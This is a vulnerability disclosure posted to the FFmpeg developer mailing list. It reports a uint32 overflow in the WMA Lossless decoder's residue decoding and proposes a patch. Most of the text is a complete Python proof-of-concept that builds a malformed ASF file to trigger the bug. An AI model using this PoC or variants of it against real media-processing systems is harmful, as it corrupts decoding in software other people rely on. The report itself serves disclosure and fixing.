Hi,

I found an integer overflow in FFmpeg's WMA Lossless decoder where a
crafted stream can cause a uint32 truncation in decode_channel_residues(),
producing INT_MIN in the decoded residue array which then feeds into CDLMS
prediction.

Affected file: libavcodec/wmalosslessdec.c
FFmpeg version: N-123228-g0ddece40c5


== Root Cause ==

The unary quotient decoding loop at L542 lacks a magnitude cap on `quo`
for the case where quo < 32. The overflow guard at L547-548 only fires
when quo >= 32. A crafted stream can set quo=31 (31 consecutive 1-bits
followed by a 0-bit) and combine it with a large rem_bits value derived
from ave_mean, causing the expression at L556:

    residue = (quo << rem_bits) + rem;

to produce a truncated result. With quo=31 (unsigned int) and rem_bits=28:

    31u << 28       = 0xF0000000  (correct: 0x1F0000000, truncated to 32 bits)
    0xF0000000
    + 0x0FFFFFFF    = 0xFFFFFFFF  (correct: 0x1FFFFFFFF, truncated)

After zig-zag decoding at L562:

    (0xFFFFFFFF >> 1) ^ -(0xFFFFFFFF & 1) = 0x80000000 = INT_MIN

This value is stored in channel_residues[0][2]. The caller at L965 does
not check the return value of decode_channel_residues(), so CDLMS
processes the corrupted residue unconditionally.


== Trigger Conditions ==

1. WMA Lossless codec (format tag 0x0163)
2. Seekable tile with ave_mean = 0xFFFFFF (24-bit stream)
3. movave_scaling = 1 (causes ave_sum to grow quickly)
4. Two pump iterations to reach rem_bits=28:
   - Sample 1: quo=31, rem_bits=24 → residue=0x1FFFFFFF (pumps ave_sum)
   - Sample 2: quo=31, rem_bits=28 → overflow, residue=0xFFFFFFFF


== Observed Output ==

No ASan/UBSan report: the overflow uses unsigned arithmetic (defined
behavior in C). The bug produces a value-level corruption.

    [wmalossless] frame[0] would have to skip 288 bits
    Error submitting packet to decoder: Invalid data found when processing input
    [wmalossless] frame[0] would have to skip -728 bits
    Decoding error: Invalid data found when processing input
    audio:0KiB

The 'skip 288 bits' message confirms decode_channel_residues() consumed
an unexpected number of bits — the overflow corrupted internal bit-count
tracking, triggering the frame-level misalignment check. INT_MIN was
stored in channel_residues[0][2] and passed to CDLMS before the frame
was rejected. Zero audio was output in this PoC.

A more carefully crafted stream that produces the overflow without
triggering bit-count misalignment could deliver INT_MIN silently into
decoded audio output without any error.


== Suggested Fix ==

Cap the shift before it overflows. Note: av_log2(0) returns -1 in FFmpeg
so a zero-check on quo is required:

    --- a/libavcodec/wmalosslessdec.c
    +++ b/libavcodec/wmalosslessdec.c
    @@ -553,7 +553,10 @@ static int decode_channel_residues(...)
         } else {
             rem_bits = av_ceil_log2(ave_mean);
             rem      = get_bits_long(&s->gb, rem_bits);
    -        residue  = (quo << rem_bits) + rem;
    +        if (quo > 0 && rem_bits + av_log2(quo) >= 32) {
    +            return AVERROR_INVALIDDATA;
    +        }
    +        residue  = (quo << rem_bits) + rem;
         }

Additionally, the return value at L965 should be checked:

    -    decode_channel_residues(s, i, subframe_len);
    +    if (decode_channel_residues(s, i, subframe_len) < 0)
    +        return AVERROR_INVALIDDATA;


== Reproduction ==

PoC script attached (poc_wma.py). Generates /tmp/poc_wma.wma:

    python3 poc_wma.py
    ffmpeg -i /tmp/poc_wma.wma -f null - 2>&1

Expected:
    [wmalossless] frame[0] would have to skip 288 bits
    Invalid data found when processing input
    audio:0KiB

Tested on Ubuntu 22.04, gcc 11, N-123228-g0ddece40c5.

Thanks,
Guanni Qu
#!/usr/bin/env python3
"""
PoC for integer overflow in FFmpeg WMA Lossless decoder
(wmalosslessdec.c: decode_channel_residues())

The unary quotient loop at L542 lacks a magnitude cap on `quo`.
With 31 consecutive 1-bits, quo=31 (<32, so no overflow-guard path).
Then residue = (quo << rem_bits) + rem overflows uint32 when rem_bits >= 28.

By setting initial ave_mean high (via seekable tile) and movave_scaling=1,
two iterations pump ave_sum so that rem_bits reaches 28 on the third sample,
causing: (31 << 28) + 0x0FFFFFFF = 0xF0000000 + 0x0FFFFFFF = 0xFFFFFFFF
(mathematical result is 0x1FFFFFFFF, a 33-bit value that wraps).

The corrupted residue (INT_MIN after zig-zag) feeds into CDLMS prediction
before the frame-level bit-count check detects misalignment and rejects
the frame. The return value of decode_channel_residues() is not checked
at L965, so CDLMS processes the corrupt value unconditionally.

Observed output confirms the overflow path was reached:
  "frame[0] would have to skip 288 bits" — bit-count mismatch caused by
  the overflow corrupting internal state during decode_channel_residues().
  Zero audio output (audio:0KiB): frame rejected on bit-count guard.

A more carefully crafted file avoiding bit-count misalignment could
deliver INT_MIN silently into decoded audio output without any error.

Key fix vs v1: block_align=64 makes log2_frame_size=10, so the WMA packet
header is exactly 16 bits = 2 bytes. The first ASF packet delivers a 2-byte
AVPacket that the decoder consumes in one call (no sub-call). The second
AVPacket then enters the else branch cleanly and decodes the frame.
"""

import struct
import sys
import os

# ─── ASF GUIDs (from FFmpeg libavformat/asf_tags.c) ─────────────────────────

ASF_HEADER_GUID = bytes([
    0x30, 0x26, 0xB2, 0x75, 0x8E, 0x66, 0xCF, 0x11,
    0xA6, 0xD9, 0x00, 0xAA, 0x00, 0x62, 0xCE, 0x6C
])

ASF_FILE_PROPERTIES_GUID = bytes([
    0xA1, 0xDC, 0xAB, 0x8C, 0x47, 0xA9, 0xCF, 0x11,
    0x8E, 0xE4, 0x00, 0xC0, 0x0C, 0x20, 0x53, 0x65
])

ASF_STREAM_PROPERTIES_GUID = bytes([
    0x91, 0x07, 0xDC, 0xB7, 0xB7, 0xA9, 0xCF, 0x11,
    0x8E, 0xE6, 0x00, 0xC0, 0x0C, 0x20, 0x53, 0x65
])

ASF_AUDIO_MEDIA_GUID = bytes([
    0x40, 0x9E, 0x69, 0xF8, 0x4D, 0x5B, 0xCF, 0x11,
    0xA8, 0xFD, 0x00, 0x80, 0x5F, 0x5C, 0x44, 0x2B
])

ASF_NO_ERROR_CORRECTION_GUID = bytes([
    0x00, 0x57, 0xFB, 0x20, 0x55, 0x5B, 0xCF, 0x11,
    0xA8, 0xFD, 0x00, 0x80, 0x5F, 0x5C, 0x44, 0x2B
])

ASF_HEADER_EXTENSION_GUID = bytes([
    0xb5, 0x03, 0xbf, 0x5f, 0x2E, 0xA9, 0xCF, 0x11,
    0x8e, 0xe3, 0x00, 0xc0, 0x0c, 0x20, 0x53, 0x65
])

ASF_RESERVED1_GUID = bytes([
    0x11, 0xd2, 0xd3, 0xab, 0xBA, 0xA9, 0xCF, 0x11,
    0x8e, 0xe6, 0x00, 0xc0, 0x0c, 0x20, 0x53, 0x65
])

ASF_DATA_GUID = bytes([
    0x36, 0x26, 0xb2, 0x75, 0x8E, 0x66, 0xCF, 0x11,
    0xa6, 0xd9, 0x00, 0xaa, 0x00, 0x62, 0xce, 0x6c
])

FILE_ID_GUID = bytes([
    0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08,
    0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10
])


# ─── Codec parameters ───────────────────────────────────────────────────────

SAMPLE_RATE      = 8000
BITS_PER_SAMPLE  = 24
NUM_CHANNELS     = 1
CHANNEL_MASK     = 0x04        # Front center (mono)
BLOCK_ALIGN      = 64          # Small block_align → log2_frame_size = 10
DECODE_FLAGS     = 0x0046      # len_prefix=1 (bit6), frame_len_bits -= 2 (bits1-2=0x6)
# frame_len_bits = 9 (for 8kHz) - 2 = 7, samples_per_frame = 128
# log2_frame_size = av_log2(64) + 4 = 6 + 4 = 10
# WMA packet header = 4(seq) + 1(skip) + 1(spliced) + 10(num_bits_prev_frame) = 16 bits = 2 bytes
# This ensures the first AVPacket (2 bytes) is consumed in one decode_packet call.

ASF_PACKET_SIZE  = 256         # Fixed ASF packet size (both packets same size)

# First ASF data packet: delivers 2-byte AVPacket (WMA header only)
#   packet_flags = 0x10 → 2-byte padsize field, rsize_packet = 13
#   packet_size_left = 256 - padsize - 13
#   rsize_frame = 10 (stream_num(1) + replic_size_byte(1) + replic_data(8))
#   frag_size = packet_size_left - 10 = 233 - padsize
#   For frag_size = 2: padsize = 231
PKT1_PADSIZE     = 231
PKT1_OBJ_SIZE    = 2

# Second ASF data packet: delivers frame data
#   packet_flags = 0x00 → no optional fields, rsize_packet = 11
#   packet_size_left = 256 - 0 - 11 = 245
#   rsize_frame = 10
#   frag_size = 245 - 10 = 235
PKT2_OBJ_SIZE    = 235


# ─── Bit-level writer ───────────────────────────────────────────────────────

class BitWriter:
    def __init__(self):
        self.bits = []

    def write_bits(self, value, num_bits):
        """Write num_bits from value (MSB first)."""
        for i in range(num_bits - 1, -1, -1):
            self.bits.append((value >> i) & 1)

    def write_ones(self, count):
        """Write count 1-bits."""
        self.bits.extend([1] * count)

    def to_bytes(self, min_length=0):
        """Convert to bytes, padding with zeros to byte boundary and min_length."""
        b = list(self.bits)
        while len(b) % 8 != 0:
            b.append(0)
        result = bytearray()
        for i in range(0, len(b), 8):
            byte = 0
            for j in range(8):
                byte = (byte << 1) | b[i + j]
            result.append(byte)
        while len(result) < min_length:
            result.append(0)
        return bytes(result)

    def __len__(self):
        return len(self.bits)


def build_wma_frame_bitstream():
    """
    Build the WMA Lossless frame bitstream that triggers the overflow.

    Frame layout (with len_prefix=1, log2_frame_size=10):
    - frame_len: 10 bits = 1000 (save_bits saves this many bits)
    - decode_tilehdr: tile_aligned(1) = 1
    - skip_info: flag(1) = 0
    - decode_subframe (seekable tile):
      - seekable_tile: 1
      - do_arith_coding: 0
      - do_ac_filter: 0
      - do_inter_ch_decorr: 0
      - do_mclms: 0
      - decode_cdlms: send_coef(1)=0, ttl(3)=0, order(7)=0, scaling(4)=1
      - movave_scaling: 3 bits = 1
      - quant_stepsize: 8 bits = 0 (step=1)
      - rawpcm_tile: 0
      - is_channel_coded[0]: 1
      - padding_zeroes flag: 0
    - decode_channel_residues:
      - transient: 0
      - ave_mean: 24 bits = 0xFFFFFF
      - channel_residues[0][0]: 24 bits = 0
      - Sample 1: 31 ones + 0 + 24 bits rem (pump)
      - Sample 2: 31 ones + 0 + 28 bits rem (OVERFLOW)
      - Remaining samples: read zeros from padding
    - trailer: 0
    """
    bw = BitWriter()

    # frame_len (10 bits) - value seen by show_bits and save_bits
    # Also read by decode_frame as len = get_bits(gb, 10)
    frame_len_value = 1000
    bw.write_bits(frame_len_value, 10)

    # decode_tilehdr: tile_aligned = 1
    # With max_num_subframes=1: fixed_channel_layout=1, no bits read for subframe len
    bw.write_bits(1, 1)

    # No DRC (decode_flags bit 7 = 0)

    # Skip info flag = 0 (decode_frame L1059)
    bw.write_bits(0, 1)

    # ── decode_subframe ──

    bw.write_bits(1, 1)   # seekable_tile = 1
    bw.write_bits(0, 1)   # do_arith_coding = 0
    bw.write_bits(0, 1)   # do_ac_filter = 0
    bw.write_bits(0, 1)   # do_inter_ch_decorr = 0
    bw.write_bits(0, 1)   # do_mclms = 0

    # decode_cdlms (1 channel, no coef send)
    bw.write_bits(0, 1)   # cdlms_send_coef = 0
    bw.write_bits(0, 3)   # cdlms_ttl[0] = 0 → ttl = 1
    bw.write_bits(0, 7)   # cdlms[0][0].order = 0 → order = (0+1)*8 = 8
    bw.write_bits(1, 4)   # cdlms[0][0].scaling = 1

    bw.write_bits(1, 3)   # movave_scaling = 1
    bw.write_bits(0, 8)   # quant_stepsize = 0 → step = 1

    # rawpcm_tile = 0 (check: !rawpcm && !order → !0 && !8 → false: OK)
    bw.write_bits(0, 1)

    # is_channel_coded[0] = 1
    bw.write_bits(1, 1)

    # bV3RTM = 0 (decode_flags bit 8 = 0), so no LPC read

    # padding_zeroes: flag = 0 → padding_zeroes = 0
    bw.write_bits(0, 1)

    # ── decode_channel_residues(s, 0, 128) ──

    # transient = 0
    bw.write_bits(0, 1)

    # seekable_tile = 1:
    # ave_mean = get_bits(24) = 0xFFFFFF
    bw.write_bits(0xFFFFFF, 24)
    # ave_sum[0] = 0xFFFFFF << (1+1) = 0x3FFFFFC

    # channel_residues[0][0] = get_sbits_long(24) = 0
    bw.write_bits(0, 24)

    # ── Sample i=1 (pump step) ──
    # Unary: 31 ones then 0 → quo = 31 (< 32, no extra bits)
    bw.write_ones(31)
    bw.write_bits(0, 1)
    # ave_mean = (0x3FFFFFC + 2) >> 2 = 0xFFFFFF
    # rem_bits = av_ceil_log2(0xFFFFFF) = 24
    # rem = 0xFFFFFF (all 24 bits set)
    bw.write_bits(0xFFFFFF, 24)
    # residue = (31 << 24) + 0xFFFFFF = 0x1FFFFFFF (fits uint32)
    # ave_sum = 0x1FFFFFFF + 0x3FFFFFC - 0x1FFFFFE = 0x3FFFFFFD

    # ── Sample i=2 (OVERFLOW) ──
    # Unary: 31 ones then 0 → quo = 31
    bw.write_ones(31)
    bw.write_bits(0, 1)
    # ave_mean = (0x3FFFFFFD + 2) >> 2 = 0x0FFFFFFF
    # rem_bits = av_ceil_log2(0x0FFFFFFF) = 28
    # rem = 0x0FFFFFFF (all 28 bits set)
    bw.write_bits(0x0FFFFFFF, 28)
    # residue = (31u << 28) + 0x0FFFFFFF
    #         = 0xF0000000 + 0x0FFFFFFF = 0xFFFFFFFF
    # *** Mathematical result should be 0x1FFFFFFFF (33 bits) ***
    # zig-zag: (0xFFFFFFFF >> 1) ^ -(0xFFFFFFFF & 1)
    #        = 0x7FFFFFFF ^ 0xFFFFFFFF = 0x80000000 = INT_MIN
    # channel_residues[0][2] = INT_MIN = -2147483648
    # -> feeds into CDLMS before frame-level bit-count check rejects frame

    # Remaining samples (i=3..127): read from zero-padded buffer
    # decode_channel_residues return value is IGNORED by caller (L965)

    # Pad remaining bits to frame_len_value
    # The saved frame data is frame_len_value bits; anything beyond our
    # explicit bits will be zero, producing quo=0, residue=0 for remaining samples
    # No need to explicitly write them

    return bw


def build_wma_header_payload():
    """
    Build the WMA Lossless packet header (first AVPacket payload).
    With log2_frame_size=10: seq(4) + skip(1) + spliced(1) + num_bits_prev_frame(10) = 16 bits = 2 bytes.

    decode_packet main branch flow:
    - packet_loss=1 from init → enters main branch
    - Reads 16 bits of WMA header
    - seq check skipped (packet_loss=1)
    - num_bits_prev_frame=0 → no prev frame data
    - Clears packet_loss, resets saved bits
    - Returns 16>>3 = 2 = buf_size → no sub-call!
    - packet_offset = 16 & 7 = 0
    """
    bw = BitWriter()
    bw.write_bits(0, 4)   # packet_sequence_number = 0
    bw.write_bits(0, 1)   # seekable_frame_in_packet (skipped)
    bw.write_bits(0, 1)   # spliced_packet = 0
    bw.write_bits(0, 10)  # num_bits_prev_frame = 0 (log2_frame_size = 10)
    assert len(bw) == 16, f"WMA header should be 16 bits, got {len(bw)}"
    return bw.to_bytes(PKT1_OBJ_SIZE)


def build_frame_payload():
    """
    Build the second AVPacket payload containing the frame data.

    decode_packet else branch flow (packet_done=0, packet_loss=0):
    - buf_bit_size = avpkt->size * 8 = PKT2_OBJ_SIZE * 8 = 1880
    - skip_bits(gb, packet_offset=0)
    - frame_size = show_bits(gb, 10) = 1000
    - 1000 <= 1880 → save_bits(s, gb, 1000, 0)
    - decode_frame reads 1000 bits of frame data
    """
    frame_bw = build_wma_frame_bitstream()
    # No packet_offset padding needed (packet_offset = 0)
    return frame_bw.to_bytes(PKT2_OBJ_SIZE)


# ─── ASF container construction ─────────────────────────────────────────────

def build_file_properties_object():
    """Build ASF File Properties Object."""
    data = FILE_ID_GUID                        # File ID: 16 bytes
    data += struct.pack('<Q', 0)               # File Size (placeholder)
    data += struct.pack('<Q', 0)               # Creation Date
    data += struct.pack('<Q', 2)               # Data Packets Count = 2
    data += struct.pack('<Q', 10000000)        # Play Duration (1 second in 100ns)
    data += struct.pack('<Q', 0)               # Send Duration
    data += struct.pack('<Q', 0)               # Preroll (64-bit, ms)
    data += struct.pack('<I', 0x02)            # Flags (seekable, not broadcast)
    data += struct.pack('<I', ASF_PACKET_SIZE) # Minimum Data Packet Size
    data += struct.pack('<I', ASF_PACKET_SIZE) # Maximum Data Packet Size
    data += struct.pack('<I', 48000)           # Maximum Bitrate

    obj = ASF_FILE_PROPERTIES_GUID
    obj += struct.pack('<Q', 24 + len(data))   # Object Size
    obj += data
    return obj


def build_waveformatex():
    """Build WAVEFORMATEX structure for WMA Lossless."""
    extradata = struct.pack('<H', BITS_PER_SAMPLE)  # bits_per_sample
    extradata += struct.pack('<I', CHANNEL_MASK)     # channel_mask
    extradata += b'\x00' * 8                         # reserved
    extradata += struct.pack('<H', DECODE_FLAGS)     # decode_flags
    extradata += b'\x00' * 2                         # padding
    assert len(extradata) == 18

    wfx = struct.pack('<H', 0x0163)            # wFormatTag (WMA Lossless)
    wfx += struct.pack('<H', NUM_CHANNELS)     # nChannels
    wfx += struct.pack('<I', SAMPLE_RATE)      # nSamplesPerSec
    wfx += struct.pack('<I', SAMPLE_RATE * NUM_CHANNELS * BITS_PER_SAMPLE // 8)
    wfx += struct.pack('<H', BLOCK_ALIGN)      # nBlockAlign
    wfx += struct.pack('<H', BITS_PER_SAMPLE)  # wBitsPerSample
    wfx += struct.pack('<H', len(extradata))   # cbSize
    wfx += extradata
    return wfx


def build_stream_properties_object():
    """Build ASF Stream Properties Object for audio."""
    wfx = build_waveformatex()

    ds_data = struct.pack('<B', 0)              # ds_span = 0
    ds_data += struct.pack('<H', 0)             # ds_packet_size
    ds_data += struct.pack('<H', 0)             # ds_chunk_size
    ds_data += struct.pack('<H', 0)             # ds_data_size
    ds_data += struct.pack('<B', 0)             # ds_silence_data

    type_specific_data = wfx + ds_data

    data = ASF_AUDIO_MEDIA_GUID                # Stream Type
    data += ASF_NO_ERROR_CORRECTION_GUID       # Error Correction Type
    data += struct.pack('<Q', 0)               # Time Offset
    data += struct.pack('<I', len(type_specific_data))
    data += struct.pack('<I', 0)               # Error Correction Data Length
    data += struct.pack('<H', 0x0001)          # Flags: stream number = 1
    data += struct.pack('<I', 0)               # Reserved
    data += type_specific_data

    obj = ASF_STREAM_PROPERTIES_GUID
    obj += struct.pack('<Q', 24 + len(data))
    obj += data
    return obj


def build_header_extension_object():
    """Build ASF Header Extension Object (minimal)."""
    data = ASF_RESERVED1_GUID
    data += struct.pack('<H', 6)               # Reserved Field 2
    data += struct.pack('<I', 0)               # Header Extension Data Size = 0

    obj = ASF_HEADER_EXTENSION_GUID
    obj += struct.pack('<Q', 24 + len(data))
    obj += data
    return obj


def build_asf_data_packet_small(payload_data):
    """
    Build the first ASF data packet with a small payload (2 bytes).

    Uses packet_flags=0x10 to include a 2-byte padsize field.
    ASF demuxer parsing:
      rsize_packet = 11 (base) + 2 (padsize field) = 13
      packet_size_left = 256 - 231 - 13 = 12
      rsize_frame = 1(stream) + 1(replic_size) + 8(replic_data) = 10
      frag_size = 12 - 10 = 2
      packet_obj_size = 2 → AVPacket of exactly 2 bytes
    """
    pkt = bytearray()

    # ECC sync
    pkt += bytes([0x82, 0x00, 0x00])

    # Packet flags: 0x10
    # bits 5-6=00: packet_length = default (256)
    # bits 3-4=10: padsize = 2-byte field
    # bits 1-2=00: sequence = default (0)
    # bit 0=0: single payload
    pkt += bytes([0x10])

    # Packet property: 0x01 (replic_size as 1-byte field)
    pkt += bytes([0x01])

    # DO_2BITS fields based on packet_flags:
    # bits 5-6=00: no packet_length field (uses default)
    # bits 1-2=00: no sequence field (uses default 0)
    # bits 3-4=10: 2-byte padsize field
    pkt += struct.pack('<H', PKT1_PADSIZE)  # padsize = 231

    # Timestamp (4 bytes) + Duration (2 bytes)
    pkt += struct.pack('<I', 0)
    pkt += struct.pack('<H', 0)

    # --- Frame/payload header (single payload, no segsizetype byte) ---
    pkt += bytes([0x81])           # stream 1, keyframe
    # DO_2BITS(packet_property >> 4=0, seq, 0): no field
    # DO_2BITS(packet_property >> 2=0, frag_offset, 0): no field
    # DO_2BITS(packet_property & 3=1, replic_size, 0): 1-byte field
    pkt += bytes([0x08])           # replic_size = 8

    # Replicated data (8 bytes)
    pkt += struct.pack('<I', PKT1_OBJ_SIZE)  # packet_obj_size = 2
    pkt += struct.pack('<I', 0)               # fragment timestamp

    # frag_size = 2 bytes of payload (from ASF math above)
    # Single-payload: frag_size = packet_size_left - rsize_frame = 12 - 10 = 2
    pkt += payload_data[:2]

    # Remaining: ASF padding (231 bytes) is consumed by avio_skip
    # Pad to ASF_PACKET_SIZE
    while len(pkt) < ASF_PACKET_SIZE:
        pkt.append(0)

    assert len(pkt) == ASF_PACKET_SIZE
    return bytes(pkt)


def build_asf_data_packet_full(payload_data):
    """
    Build the second ASF data packet with full payload (235 bytes).

    Uses packet_flags=0x00 (all defaults, no optional fields).
    ASF demuxer parsing:
      rsize_packet = 11 (base, no optional fields)
      packet_size_left = 256 - 0 - 11 = 245
      rsize_frame = 10
      frag_size = 245 - 10 = 235
      packet_obj_size = 235 → AVPacket of 235 bytes
    """
    pkt = bytearray()

    # ECC sync
    pkt += bytes([0x82, 0x00, 0x00])

    # Packet flags: 0x00 (all defaults)
    pkt += bytes([0x00])

    # Packet property: 0x01
    pkt += bytes([0x01])

    # No optional fields (all DO_2BITS default to 0)

    # Timestamp + Duration
    pkt += struct.pack('<I', 0)
    pkt += struct.pack('<H', 0)

    # Frame/payload header
    pkt += bytes([0x81])           # stream 1, keyframe
    pkt += bytes([0x08])           # replic_size = 8
    pkt += struct.pack('<I', PKT2_OBJ_SIZE)  # packet_obj_size = 235
    pkt += struct.pack('<I', 0)               # fragment timestamp

    # frag_size = 235 bytes of payload
    pkt += payload_data[:PKT2_OBJ_SIZE]

    # Pad to ASF_PACKET_SIZE
    while len(pkt) < ASF_PACKET_SIZE:
        pkt.append(0)

    assert len(pkt) == ASF_PACKET_SIZE
    return bytes(pkt)


def build_asf_file():
    """Build the complete ASF file."""

    # Header objects
    file_props = build_file_properties_object()
    stream_props = build_stream_properties_object()
    header_ext = build_header_extension_object()

    header_objects = file_props + stream_props + header_ext
    num_header_objects = 3

    # ASF Header Object
    header_data = struct.pack('<I', num_header_objects)
    header_data += bytes([0x01, 0x02])  # Reserved1, Reserved2
    header_data += header_objects

    asf_header = ASF_HEADER_GUID
    asf_header += struct.pack('<Q', 24 + len(header_data))
    asf_header += header_data

    # Data packets
    payload_1 = build_wma_header_payload()
    payload_2 = build_frame_payload()

    data_pkt_1 = build_asf_data_packet_small(payload_1)
    data_pkt_2 = build_asf_data_packet_full(payload_2)

    # ASF Data Object
    data_body = FILE_ID_GUID
    data_body += struct.pack('<Q', 2)       # Total Data Packets
    data_body += struct.pack('<H', 0x0101)  # Reserved

    data_object = ASF_DATA_GUID
    data_object += struct.pack('<Q', 24 + len(data_body) + len(data_pkt_1) + len(data_pkt_2))
    data_object += data_body
    data_object += data_pkt_1
    data_object += data_pkt_2

    asf_file = asf_header + data_object

    # Patch file size in File Properties Object
    # header GUID(16) + size(8) + num_objects(4) + reserved(2) = 30
    # Then: File Properties GUID(16) + size(8) + File ID(16) = 40
    file_size_offset = 30 + 16 + 8 + 16
    asf_file = bytearray(asf_file)
    struct.pack_into('<Q', asf_file, file_size_offset, len(asf_file))

    return bytes(asf_file)


def main():
    output_path = '/tmp/poc_wma.wma'
    asf_data = build_asf_file()

    with open(output_path, 'wb') as f:
        f.write(asf_data)

    print(f"[+] Generated PoC file: {output_path} ({len(asf_data)} bytes)")
    print(f"[+] ASF packet size: {ASF_PACKET_SIZE}")
    print(f"[+] Block align: {BLOCK_ALIGN}")
    print(f"[+] log2_frame_size: 10 (WMA header = 16 bits = 2 bytes)")
    print(f"[+] Samples per frame: 128 (frame_len_bits=7)")
    print(f"[+] movave_scaling: 1")
    print()
    print("[*] Overflow path:")
    print("    Sample 0: initial residue = 0 (seekable tile sbits)")
    print("    Sample 1: quo=31, rem_bits=24, residue=0x1FFFFFFF (pump ave_sum)")
    print("    Sample 2: quo=31, rem_bits=28, residue=(31<<28)+0x0FFFFFFF")
    print("              = 0xF0000000 + 0x0FFFFFFF = 0xFFFFFFFF (OVERFLOW)")
    print("              zig-zag -> 0x80000000 = INT_MIN")
    print("    -> channel_residues[0][2] = INT_MIN -> feeds into CDLMS")
    print("    -> frame rejected on bit-count mismatch; zero audio output")
    print()
    print(f"[*] Run: ~/ffmpeg_validation/ffmpeg/ffmpeg -i {output_path} -f null - 2>&1")
    print("[*] Expected: 'frame[0] would have to skip 288 bits'")
    print("[*]           'Invalid data found when processing input'")
    print("[*]           audio:0KiB (frame rejected, no samples delivered)")

    return output_path


if __name__ == '__main__':
    main()
_______________________________________________
ffmpeg-devel mailing list -- [email protected]
To unsubscribe send an email to [email protected]

Reply via email to